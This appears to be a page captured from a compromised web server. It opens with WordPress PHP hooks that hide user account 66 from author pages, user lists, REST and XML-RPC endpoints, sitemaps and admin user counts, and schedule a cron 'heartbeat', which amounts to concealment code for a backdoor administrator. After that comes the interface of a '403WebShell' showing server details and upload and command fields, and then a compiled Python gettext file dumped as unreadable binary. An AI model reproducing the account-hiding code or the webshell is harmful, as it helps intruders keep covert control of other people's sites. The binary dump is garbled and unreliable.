add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/self/root/lib/python3.12/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/lib/python3.12/__pycache__/gettext.cpython-312.pyc
�

:5j�T���dZddlZddlZddlZddlZgd�Zejjejdd�Z	ejdejejz�Z
d�Zd�Zd	Zeed
�D���cic]\}}|D]}||���c}}}Zddd
d�Zd&d�Zd�Zd�Zd�ZGd�d�ZGd�de�Zd'd�ZiZ		d(d�Zd)dd�d�Ziadad)d�Zd)d�Z d�Z!d�Z"d �Z#d!�Z$d"�Z%d#�Z&d$�Z'd%�Z(eZ)ycc}}}w)*a�Internationalization and localization support.

This module provides internationalization (I18N) and localization (L10N)
support for your Python programs by providing an interface to the GNU gettext
message catalog library.

I18N refers to the operation by which a program is made aware of multiple
languages.  L10N refers to the adaptation of your program, once
internationalized, to the local language and cultural habits.

�N)�NullTranslations�GNUTranslations�Catalog�bindtextdomain�find�translation�install�
textdomain�dgettext�	dngettext�gettext�ngettext�pgettext�	dpgettext�	npgettext�
dnpgettext�share�localea�
        (?P<WHITESPACES>[ \t]+)                    | # spaces and horizontal tabs
        (?P<NUMBER>[0-9]+\b)                       | # decimal integer
        (?P<NAME>n\b)                              | # only n is allowed
        (?P<PARENTHESIS>[()])                      |
        (?P<OPERATOR>[-*/%+?:]|[><!]=?|==|&&|\|\|) | # !, *, /, %, +, -, <, >,
                                                     # <=, >=, ==, !=, &&, ||,
                                                     # ? :
                                                     # unary and bitwise ops
                                                     # not allowed
        (?P<INVALID>\w+|.)                           # invalid token
    c#��K�tjt|�D]<}|j}|dk(r�|j	|�}|dk(rtd|z��|���>d��y�w)N�WHITESPACES�INVALIDz invalid token in plural form: %s�)�re�finditer�_token_pattern�	lastgroup�group�
ValueError)�plural�mo�kind�values    �/usr/lib/python3.12/gettext.py�	_tokenizer$Wsf�����k�k�.�&�1����|�|���=� ���������9���?�%�G�H�H����
�H�s�AA!c�8�|rtd|z�Std�S)Nz#unexpected token in plural form: %szunexpected end of plural form)r)r"s r#�_errorr&cs"����?�%�G�H�H��9�:�:�))�||)�&&)z==z!=)�<�>z<=z>=)�+�-)�*�/�%��or�andz//)r(r)r/c��d}t|�}|dk(r|dz
}t|�}|dk(r�|dk(r&t|�\}}|�d|�d�}|dk7r+td��|dk(r|�|��}n	t|d�}d	||fz}t|�}d
}|t
vrYt
|}||krnJ|dvr	|dvrd|z}tj||�}t||d
z�\}	}|�d|�d|	��}|}|t
vr�Y||cxk(rdk(rnnd|z}|dk(rF|dkrAt|d�\}
}|dk7rt	|��t|�\}}|
�d|�d|��}|dk(rd|z}||fS#t$r
t	|�d�wxYw)Nr�!znot �(�)z%unbalanced parenthesis in plural form�n�
z%s%d�d)��z(%s)r1� r<�?r�:z if z else )�next�_parser�intr&�_binary_ops�	_c2py_ops�get)�tokens�priority�result�nexttok�subr"�j�i�op�right�if_true�if_falses            r#rArAvs���
�F��6�l�G�
�S�.��&����v�,���S�.��#�~��f�~���W�#�S�)���c�>��D�E�E�	�C��!�7�+��	,����$�E��6�5�/�)���6�l�G��A�
�[�
 ��� ���x�<����;�1��;��f�_�F�
�]�]�7�G�
,�����A��.���w�%�r�5�1��
���[�
 �	�H�����&����#�~�(�a�-�!�&�!�,�����c�>���/�!�"�6�N���'�'.���A���q�=��f�_�F��7�?���=�	,���/�t�+�	,�s�!E�Ec���	t|�ddl}tjd�}d}|j�b|jjd�tk(r@|dz
}|j}|j�#|jjd�tk(r�@|jd|jj��t|�|S#t$r$td|jj���d�wxYw)Nz%Plural value must be an integer, got rr1��__name__)�round�	TypeError�	__class__rS�warnings�sys�	_getframe�f_back�	f_globalsrE�warn�DeprecationWarning)r8rW�frame�
stacklevels    r#�_as_intr`�s���;�
�a��
��M�M�!��E��J�
�,�,�
"�u���':�':�:�'F�(�'R��a��
������,�,�
"�u���':�':�:�'F�(�'R�
�M�M��;�;�'�'�*�$���
�H���;�����-�-�0�1�6:�	;�;�s�C�-C3c�N�t|�dkDrtd��	tt|��\}}|rt	|��d}|D](}|dk(r|dz
}|dkDs�td��|dk(s�$|dz}�*t
td	�}td
|z|�|dS#t$rtd��wxYw)z�Gets a C expression as used in PO files for plural forms and returns a
    Python function that implements an equivalent expression.
    i�z"plural form expression is too longrr6r1�z%plural form expression is too complexr7)r`rSz�if True:
            def func(n):
                if not isinstance(n, int):
                    n = _as_int(n)
                return int(%s)
            �func)	�lenrrAr$r&r`rS�exec�RecursionError)rrHrI�depth�c�nss      r#�c2pyrj�s���
�6�{�T���=�>�>�B� ��6�!2�3�������/�!����	�A��C�x���
���2�:�%�%L�M�M��c����
��	�!�h�
7����
��
�	��&�z����B��@�A�A�B�s�:B�B�''B�B$c���ddl}|j|�}d}d}d}d}|jd�}|dk\r||d}|d|}||z}nd}|jd�}|dk\r||d}|d|}||z}nd}|jd�}|dk\r||d}	|d|}||z}nd}	|}
g}t|dz�D]:}||zr�
|
}
||zr|
|	z
}
||zr|
|z
}
||zr|
|z
}
|j	|
��<|j�|S)	Nrr1rRr<�@r�.�_)r�	normalizer�range�append�reverse)�locr�COMPONENT_CODESET�COMPONENT_TERRITORY�COMPONENT_MODIFIER�mask�pos�modifier�codeset�	territory�language�retrL�vals              r#�_expand_langr�sX���
�
�
�3�
�C� �� �� ���D�

�(�(�3�-�C�
�a�x��s�t�9���$�3�i���"�"����

�(�(�3�-�C�
�a�x��c�d�)���$�3�i���!�!����

�(�(�3�-�C�
�a�x����I�	��$�3�i���#�#���	��H�
�C�
�4��6�]����T�E�	��C��&�&��y�(8���$�$��w����%�%��x����J�J�s�O�
��K�K�M��Jr'c�L�eZdZdd�Zd�Zd�Zd�Zd�Zd�Zd�Z	d	�Z
d
�Zdd�Zy)
rNc�V�i|_d|_d|_|�|j|�yy�N)�_info�_charset�	_fallbackrA��self�fps  r#�__init__zNullTranslations.__init__s,����
���
����
�>��K�K��O�r'c��yr��r�s  r#rAzNullTranslations._parses��r'c�b�|jr|jj|�y||_yr�)r��add_fallback)r��fallbacks  r#r�zNullTranslations.add_fallbacks"���>�>��N�N�'�'��1�%�D�Nr'c�T�|jr|jj|�S|Sr�)r�r
)r��messages  r#r
zNullTranslations.gettexts#���>�>��>�>�)�)�'�2�2��r'c�f�|jr|jj|||�S|dk(r|S|S�Nr1)r�r)r��msgid1�msgid2r8s    r#rzNullTranslations.ngettext s3���>�>��>�>�*�*�6�6�1�=�=���6��M��Mr'c�V�|jr|jj||�S|Sr�)r�r)r��contextr�s   r#rzNullTranslations.pgettext(s%���>�>��>�>�*�*�7�G�<�<��r'c�h�|jr|jj||||�S|dk(r|S|Sr�)r�r)r�r�r�r�r8s     r#rzNullTranslations.npgettext-s5���>�>��>�>�+�+�G�V�V�Q�G�G���6��M��Mr'c��|jSr�)r��r�s r#�infozNullTranslations.info5s���z�z�r'c��|jSr�)r�r�s r#�charsetzNullTranslations.charset8s���}�}�r'c��ddl}|j|jd<|�1hd�}|t|�zD]}t	||�|j|<�yy)Nrrn>r
rrr)�builtinsr
�__dict__�set�getattr)r��namesr��allowed�names     r#r	zNullTranslations.install;sX���!%������#����F�G��#�e�*�,�
>��*1�$��*=��!�!�$�'�
>�r'r�)
rS�
__module__�__qualname__r�rAr�r
rrrr�r�r	r�r'r#rr
s4���
�&��
��
���>r'rc�@�eZdZdZdZdZdZd�Zd�Zd�Z	d�Z
d	�Zd
�Zy)rl�*l�$<z%s%s)rr1c��|dz	|dzfS)z/Returns a tuple of major version, minor version�i��r�)r��versions  r#�
_get_versionszGNUTranslations._get_versionsPs���2�
�w��/�0�0r'c��ddlm}t|dd�}ix|_}d�|_|j�}t
|�}|d|dd�d}||jk(r|d	|dd
�\}}	}
}d}n0||jk(r|d|dd
�\}}	}
}d
}n
tdd|��|j|�\}
}|
|jvrtddt|
�z|��td|	�D�]}||||
|
dz�\}}||z}|||||dz�\}}||z}||kr||kr|||}|||}n
tdd|��|dk(�r4d}|jd�D�]}|j�j!�}|s�%|j#d�r|j%d�r�Hdx}}d|vrU|jdd�\}}|j!�j'�}|j!�}||j(|<|}n|r|j(|xxd|zz
cc<|dk(r|jd�d|_��|dk(s��|jd�}|djd�d}t-|�|_�� |j*xsd}d|vrV|jd�\}} |jd�}t||�}t/|�D]\}}!t|!|�|||f<�nt||�|t||�<|
dz
}
|dz
}��y)z8Override this method to support alternative .mo formats.r)�unpackr�rc��t|dk7�Sr�)rB)r8s r#�<lambda>z(GNUTranslations._parse.<locals>.<lambda>]s���A��F��r'z<INr<z<4Irbz<IIz>4Iz>IIzBad magic numberzBad version number �zFile is corrupt�
z	#-#-#-#-#r?r1�
zcontent-typezcharset=zplural-forms�;zplural=�ascii�)�structr�r��_catalogr�readrd�LE_MAGIC�BE_MAGIC�OSErrorr��VERSIONS�strrp�split�decode�strip�
startswith�endswith�lowerr�r�rj�	enumerate)"r�r�r��filename�catalog�buf�buflen�magicr��msgcount�	masteridx�transidx�ii�
major_version�
minor_versionrL�mlen�moff�mend�tlen�toff�tend�msg�tmsg�lastk�b_item�item�k�vrr�r�r��xs"                                  r#rAzGNUTranslations._parseTs@��	"��2�v�r�*��#%�$��
��+����g�g�i���S����t�S��!�W�%�a�(���D�M�M�!�5;�E�3�q��9�5M�2�G�X�y�(��B�
�d�m�m�
#�5;�E�3�q��9�5M�2�G�X�y�(��B��!�/��:�:�'+�'9�'9�'�'B�$�
�}���
�
�-��!�2�S��5G�G��R�R��q�(�#�9	�A���C�	�)�A�+�$>�?�J�D�$��$�;�D���C���!��$<�=�J�D�$��$�;�D��f�}�����$�t�n���4��~���a�!2�H�=�=��q�y���"�j�j��/�3�F�!�=�=�?�0�0�2�D�� ����{�3��
�
�k�8R� � �L�A���d�{�#�z�z�#�q�1���1��G�G�I�O�O�-���G�G�I��()��
�
�1�
� !����
�
�5�)�T�D�[�8�)��N�*�()���
�(;�A�(>��
��n�,��G�G�C�L��!"�1����I�!6�q�!9��&*�6�l���+3�>�m�m�.�w�G��#�~�!$���7�!3�����z�z�'�*���V�W�-��%�d�O�;�D�A�q�+.�q�'�?�G�V�Q�K�(�;�.1��w�-?���C��)�*���N�I���M�H�s9	r'c��t�}|jj||�}||ur-|jj||jd�f|�}||ur|S|jr|jj|�S|Sr�)�objectr�rErr�r
)r�r��missingr�s    r#r
zGNUTranslations.gettext�sw���(���}�}� � ��'�2���7�?��=�=�$�$�g�t�{�{�1�~�%>��H�D��w���K��>�>��>�>�)�)�'�2�2��r'c���	|j||j|�f}|S#t$r;|jr|jj	|||�cYS|dk(r|}Y|S|}Y|SwxYwr�)r�r�KeyErrorr�r)r�r�r�r8r�s     r#rzGNUTranslations.ngettext�sy��	��=�=�&�$�+�+�a�.�!9�:�D�����	��~�~��~�~�.�.�v�v�q�A�A��A�v���������	�s� $�2A(�A(�"A(�'A(c�2�|j||fz}t�}|jj||�}||ur-|jj||j	d�f|�}||ur|S|j
r|j
j
||�S|Sr�)�CONTEXTr�r�rErr�r)r�r�r��ctxt_msg_idr�r�s      r#rzGNUTranslations.pgettext�s����l�l�g�w�%7�7���(���}�}� � ��g�6���7�?��=�=�$�$�k�4�;�;�q�>�%B�G�L�D��w���K��>�>��>�>�*�*�7�G�<�<��r'c��|j||fz}	|j||j|�f}|S#t$r<|jr |jj||||�cYS|dk(r|}Y|S|}Y|SwxYwr�)r�r�rr�r�r)r�r�r�r�r8r�r�s       r#rzGNUTranslations.npgettext�s����l�l�g�v�%6�6��	��=�=��d�k�k�!�n�!<�=�D�����	��~�~��~�~�/�/�����K�K��A�v���������	�s� 5�3A:�*A:�4A:�9A:N)
rSr�r�r�r�r�r�r�rAr
rrrr�r'r#rrDs:���H��H��G��H�1�W�r	�
�
�r'rc��|�t}|�Rg}dD]6}tjj|�}|s�%|j	d�}nd|vr|jd�g}|D](}t
|�D]}||vs�|j|���*|rg}	nd}	|D]�}|dk(r|	Stjj||dd|z�}
tjjd|dd|z�}tjj|
�r|r|	j|
�n|
cStjj|�s��|r|	j|���|cS|	S)N)�LANGUAGE�LC_ALL�LC_MESSAGES�LANGr?�Cr�z%s.moz/usr/share/locale-langpack)
�_default_localedir�os�environrEr�rqr�path�join�exists)�domain�	localedir�	languages�all�envarr~�nelangs�lang�nelangrH�mofile�	mofile_lps            r#rr�sd����&�	����	�B�	�E��*�*�.�.��'�C���I�I�c�N�	��		�
�i�����S�!��G��'��"�4�(�	'�F��W�$����v�&�	'�'�
������!���3�;��,�M�+�����i��}�g��>N�O���G�G�L�L�!=�t�,�g��.>�@�	��7�7�>�>�&�!���
�
�f�%��
��7�7�>�>�)�$���
�
�i�(� � �-!�0�Mr'c���|�t}t|||d��}|s|r
t�Sddlm}t|d|��d}|D]�}|tjj|�f}	tj|	�}
|
�1t|d�5}tj|	||��}
ddd�ddl
}|j|
�}
|�|
}��|j|
���|S#1swY�8xYw)NT)r�r)�ENOENTz$No translation file found for domain�rb)rrr�errnor��FileNotFoundErrorr�r��abspath�
_translationsrE�open�
setdefault�copyr�)
r�r�r��class_r��mofilesr�rHr��key�tr�rs
             r#rrs���
�~� ���6�9�i�T�:�G���#�%�%� ��� F��P�	P��F��#���r�w�w���v�.�/�����c�"���9��f�d�#�
>�r�!�,�,�S�&��*�=��
>�	��I�I�a�L���>��F�����"�!#�"�M�
>�
>�s�C�C!	)r�c�B�t||d��}|j|�y)NT)r�)rr	)r�r�r�r
s    r#r	r	8s���F�I��5�A��I�I�e�r'�messagesc��|�|atSr�)�_current_domain)r�s r#r
r
Cs��
�� ���r'c�L�|�	|t|<tj|t�Sr�)�_localedirsrEr�)r�r�s  r#rrJs$����'��F���?�?�6�#5�6�6r'c��	t|tj|d��}|j	|�S#t$r|cYSwxYwr�)rrrEr�r
)r�r�r
s   r#rrQsE���������� =�>��
�9�9�W���������s� 3�A�Ac��	t|tj|d��}|j	|||�S#t$r|dk(r|cYS|cYSwxYwr�)rrrEr�r)r�r�r�r8r
s     r#rrYsU���������� =�>��
�:�:�f�f�a�(�(������6��M��M�	�s� 5�A�A�Ac��	t|tj|d��}|j	||�S#t$r|cYSwxYwr�)rrrEr�r)r�r�r�r
s    r#rrdsG���������� =�>��
�:�:�g�w�'�'�������s� 4�A�Ac��	t|tj|d��}|j	||||�S#t$r|dk(r|cYS|cYSwxYwr�)rrrEr�r)r�r�r�r�r8r
s      r#rrlsW���������� =�>��
�;�;�w����2�2������6��M��M�	�s� 6�A
�A
�A
c�"�tt|�Sr�)rr)r�s r#r
r
ws���O�W�-�-r'c�&�tt|||�Sr�)rr)r�r�r8s   r#rr{s���_�f�f�a�8�8r'c�$�tt||�Sr�)rr)r�r�s  r#rrs���_�g�w�7�7r'c�(�tt||||�Sr�)rr)r�r�r�r8s    r#rr�s���o�w����B�Br')���)NNF)NNNFr�)*�__doc__�operatorr�rrX�__all__r�r��base_prefixr��compile�VERBOSE�DOTALLrr$r&rCr�rDrAr`rjrrrrrrr	rrr
rrrrrr
rrrr)rL�opsrMs000r#�<module>r"sZ��
�`�	�	�
�
���W�W�\�\�#�/�/�7�H�E�������
���B�I�I�	���	
�;���$-�[�!�#<�K�K���C�s�K��r�1�u�K�r�K���u�4�0�	�/�d
�(!B�H'�T7>�7>�tW�&�W�v0�h�
�37�&+��D�T�������7��)�(�3�.�9�8�C�$���GLs�=C8

Youez - 2016 - github.com/yon3zu
LinuXploit